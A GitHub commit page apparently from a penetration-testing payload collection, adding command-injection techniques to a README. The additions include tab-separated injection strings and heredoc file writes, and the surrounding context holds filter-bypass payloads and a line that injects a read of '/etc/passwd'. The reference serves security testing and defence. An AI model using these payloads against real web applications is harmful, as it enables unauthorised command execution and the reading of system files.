Skip to content

Commit

Permalink
Merge pull request swisskyrepo#475 from int0x80/cmd-inj-spaces
Browse files Browse the repository at this point in the history 
Command Injection space alternatives
  • Loading branch information
@swisskyrepo
swisskyrepo authored Jan 15, 2022
2 parents f23412d + 171a6f2 commit c89976d
Showing 1 changed file with 18 additions and 0 deletions.
18 changes: 18 additions & 0 deletions Command Injection/README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -96,6 +96,16 @@ Commands execution without spaces, $ or { } - Linux (Bash only)
IFS=,;`cat<<<uname,-a`
```

Tabs work as separators in web apps where spaces are removed.

```powershell
;ls%09-al%09/home
drwxr-xr-x 4 root root 4096 Jan 10 13:34 .
drwxr-xr-x 18 root root 4096 Jan 10 13:33 ..
drwx------ 2 root root 16384 Jan 10 13:31 lost+found
drwxr-xr-x 4 test test 4096 Jan 13 08:30 test
```

Works on Windows only.

```powershell
Expand All @@ -109,6 +119,14 @@ ping%PROGRAMFILES:~10,-5%IP
something%0Acat%20/etc/passwd
```

You can also write files.

```powershell
;cat>/tmp/hi<<EOF%0ahello%0aEOF
;cat</tmp/hi
hello
```

### Bypass characters filter via hex encoding

Linux
Expand Down

0 comments on commit c89976d

Please sign in to comment.